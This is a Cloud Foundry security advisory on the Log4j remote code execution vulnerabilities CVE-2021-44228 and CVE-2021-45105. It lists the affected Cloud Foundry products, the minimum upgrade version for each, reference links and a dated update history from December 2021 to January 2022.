Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105 ) impact on Cloud Foundry Products | Cloud Foundry

Severity

Critical

Vendor

Cloud Foundry Foundation

Description

A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed . Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser and may allow for remote code execution in impacted cloud foundry products.

This is an ongoing event, please check this advisory for frequent updates as they develop. The advisory has been updated to cover for CVE-2021-45105 too which was later identified in log4j versions below 2.17.0 .

Affected Cloud Foundry Products and Versions

Severity is critical unless otherwise noted.

• UAA
• Credhub
• Cf-for-k8s
• Cf-deployment
• PHP buildpack
• Java buildpack

Mitigation

Users of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases( for both the above CVEs):

• UAA-Upgrade all versions to 75.13.0 or greater
• Credhub – Upgrade all versions to 2.11.0 or greater
• Cf-for-k8s – Upgrade all versions to v5.4.2 or greater
• Cf-deployment – Upgrade all versions to 17.1.0 or greater
• PHP- buildpack – Upgrade all versions to 4.4.54 or greater
• Java buildpack – Upgrade all versions to 4.47 or greater

References:

https://vulners.com/cve/CVE-2021-44228

<https://github.com/advisories/GHSA-jfh8-c2jp-5v3q&gt;

History

2021-12-13: Initial vulnerability report published.

2021-12-14: Updated with patch details of Cf-for-k8s

2021-12-15: Updated credhub, UAA and Php buildpack versions with latest log4j 2.16 versions

2021-12-18: Updated cf-for-k8s, cf-deployment, Java buildpack versions with latest log4j 2.16 versions

2022-01-06: Updated UAA, Java buildpack, PHP- buildpack, Cf-for-k8s versions for fixes of CVE-2021-45105.